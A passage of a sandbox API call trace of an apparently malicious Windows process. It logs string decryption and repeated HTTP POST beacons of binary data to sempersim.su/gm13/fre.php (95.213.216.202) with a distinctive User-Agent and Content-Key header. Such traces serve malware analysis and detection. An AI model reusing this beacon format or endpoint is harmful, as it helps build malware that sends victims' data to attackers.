binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0230.672] GetProcessHeap () returned 0x620000 [0230.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0230.672] GetProcessHeap () returned 0x620000 [0230.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0230.673] send (s=0x3a8, buf=0x63a880*, len=237, flags=0) returned 237 [0230.673] send (s=0x3a8, buf=0x6421e0*, len=159, flags=0) returned 159 [0230.674] GetProcessHeap () returned 0x620000 [0230.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0230.674] recv (in: s=0x3a8, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0232.958] GetProcessHeap () returned 0x620000 [0232.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0232.959] GetProcessHeap () returned 0x620000 [0232.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0232.959] GetProcessHeap () returned 0x620000 [0232.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0232.959] GetProcessHeap () returned 0x620000 [0232.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0232.960] closesocket (s=0x3a8) returned 0 [0232.960] GetProcessHeap () returned 0x620000 [0232.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b610 | out: hHeap=0x620000) returned 1 [0232.960] GetProcessHeap () returned 0x620000 [0232.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6460f8 | out: hHeap=0x620000) returned 1 [0232.961] GetProcessHeap () returned 0x620000 [0232.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435f0 | out: hHeap=0x620000) returned 1 [0232.961] GetProcessHeap () returned 0x620000 [0232.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0232.961] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x348) returned 0x3a8 [0232.962] Sleep (dwMilliseconds=0xea60) [0232.985] GetProcessHeap () returned 0x620000 [0232.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643200 [0232.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0232.987] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0232.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0232.998] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0233.006] GetProcessHeap () returned 0x620000 [0233.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0233.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.007] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0233.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.012] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0233.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.013] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.013] GetProcessHeap () returned 0x620000 [0233.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0233.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.014] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0233.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.015] CryptDestroyKey (hKey=0x62d710) returned 1 [0233.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.016] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0233.016] GetProcessHeap () returned 0x620000 [0233.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x6460f8 [0233.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0233.017] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0233.018] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0233.018] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0233.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0233.019] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0233.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0233.020] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0233.020] GetProcessHeap () returned 0x620000 [0233.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0233.020] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0233.021] GetProcessHeap () returned 0x620000 [0233.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0233.021] GetProcessHeap () returned 0x620000 [0233.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6460f8 | out: hHeap=0x620000) returned 1 [0233.022] GetProcessHeap () returned 0x620000 [0233.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0233.022] GetProcessHeap () returned 0x620000 [0233.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0233.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.023] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0233.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.031] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0233.038] GetProcessHeap () returned 0x620000 [0233.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639098 [0233.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.039] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639098*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0233.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.041] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0233.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.042] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0233.042] GetProcessHeap () returned 0x620000 [0233.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639098 | out: hHeap=0x620000) returned 1 [0233.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.045] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0233.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.046] CryptDestroyKey (hKey=0x62d710) returned 1 [0233.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0233.047] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0233.047] GetProcessHeap () returned 0x620000 [0233.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0233.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0233.048] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0233.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0233.049] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0233.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0233.050] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0233.050] GetProcessHeap () returned 0x620000 [0233.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0233.050] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c1e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0233.052] GetProcessHeap () returned 0x620000 [0233.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b640 [0233.052] socket (af=2, type=1, protocol=6) returned 0x3ac [0233.053] connect (s=0x3ac, name=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0233.101] FreeAddrInfoW (pAddrInfo=0x63c1e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0233.101] GetProcessHeap () returned 0x620000 [0233.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0233.101] GetProcessHeap () returned 0x620000 [0233.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0233.102] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0233.103] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0233.103] GetProcessHeap () returned 0x620000 [0233.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0233.103] GetProcessHeap () returned 0x620000 [0233.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0233.104] GetProcessHeap () returned 0x620000 [0233.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642dc8 [0233.104] GetProcessHeap () returned 0x620000 [0233.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0233.105] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0233.105] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0233.106] GetProcessHeap () returned 0x620000 [0233.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0233.106] GetProcessHeap () returned 0x620000 [0233.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0233.106] send (s=0x3ac, buf=0x63a880*, len=237, flags=0) returned 237 [0233.107] send (s=0x3ac, buf=0x6421e0*, len=159, flags=0) returned 159 [0233.107] GetProcessHeap () returned 0x620000 [0233.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0233.107] recv (in: s=0x3ac, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0234.974] GetProcessHeap () returned 0x620000 [0234.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0234.974] GetProcessHeap () returned 0x620000 [0234.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642dc8 | out: hHeap=0x620000) returned 1 [0234.975] GetProcessHeap () returned 0x620000 [0234.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0234.975] GetProcessHeap () returned 0x620000 [0234.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0234.975] closesocket (s=0x3ac) returned 0 [0234.977] GetProcessHeap () returned 0x620000 [0234.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b640 | out: hHeap=0x620000) returned 1 [0234.977] GetProcessHeap () returned 0x620000 [0234.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0234.977] GetProcessHeap () returned 0x620000 [0234.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0234.977] GetProcessHeap () returned 0x620000 [0234.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0234.978] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x50c) returned 0x3ac [0234.981] Sleep (dwMilliseconds=0xea60) [0234.995] GetProcessHeap () returned 0x620000 [0234.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0234.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0234.996] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0235.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.007] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0235.035] GetProcessHeap () returned 0x620000 [0235.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0235.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.037] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0235.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.038] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.039] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.039] GetProcessHeap () returned 0x620000 [0235.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0235.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.040] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0235.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.044] CryptDestroyKey (hKey=0x62d710) returned 1 [0235.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.045] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0235.045] GetProcessHeap () returned 0x620000 [0235.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0235.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0235.046] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0235.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0235.047] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0235.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0235.048] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0235.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0235.049] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0235.049] GetProcessHeap () returned 0x620000 [0235.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0235.049] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0235.050] GetProcessHeap () returned 0x620000 [0235.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0235.050] GetProcessHeap () returned 0x620000 [0235.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0235.051] GetProcessHeap () returned 0x620000 [0235.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0235.051] GetProcessHeap () returned 0x620000 [0235.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642f78 [0235.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.052] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0235.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.062] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0235.070] GetProcessHeap () returned 0x620000 [0235.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639068 [0235.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.071] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639068*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0235.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.072] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.075] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.075] GetProcessHeap () returned 0x620000 [0235.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639068 | out: hHeap=0x620000) returned 1 [0235.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.076] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642f78, pdwDataLen=0x19fcfc | out: pbData=0x642f78, pdwDataLen=0x19fcfc) returned 1 [0235.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.077] CryptDestroyKey (hKey=0x62d710) returned 1 [0235.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0235.078] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0235.078] GetProcessHeap () returned 0x620000 [0235.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646548 [0235.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0235.079] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0235.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0235.079] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0235.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0235.080] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0235.080] GetProcessHeap () returned 0x620000 [0235.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0235.080] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c078*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0235.082] GetProcessHeap () returned 0x620000 [0235.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5a0 [0235.082] socket (af=2, type=1, protocol=6) returned 0x3b0 [0235.082] connect (s=0x3b0, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0235.133] FreeAddrInfoW (pAddrInfo=0x63c078*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0235.133] GetProcessHeap () returned 0x620000 [0235.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0235.133] GetProcessHeap () returned 0x620000 [0235.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0235.134] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0235.136] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0235.136] GetProcessHeap () returned 0x620000 [0235.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0235.136] GetProcessHeap () returned 0x620000 [0235.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0235.137] GetProcessHeap () returned 0x620000 [0235.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643248 [0235.137] GetProcessHeap () returned 0x620000 [0235.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0235.138] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0235.139] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0235.139] GetProcessHeap () returned 0x620000 [0235.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0235.140] GetProcessHeap () returned 0x620000 [0235.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0235.140] send (s=0x3b0, buf=0x63a880*, len=237, flags=0) returned 237 [0235.141] send (s=0x3b0, buf=0x6421e0*, len=159, flags=0) returned 159 [0235.141] GetProcessHeap () returned 0x620000 [0235.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0235.141] recv (in: s=0x3b0, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0236.602] GetProcessHeap () returned 0x620000 [0236.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0236.602] GetProcessHeap () returned 0x620000 [0236.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0236.603] GetProcessHeap () returned 0x620000 [0236.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0236.603] GetProcessHeap () returned 0x620000 [0236.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0236.625] closesocket (s=0x3b0) returned 0 [0236.626] GetProcessHeap () returned 0x620000 [0236.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5a0 | out: hHeap=0x620000) returned 1 [0236.626] GetProcessHeap () returned 0x620000 [0236.626] HeapFree (in: 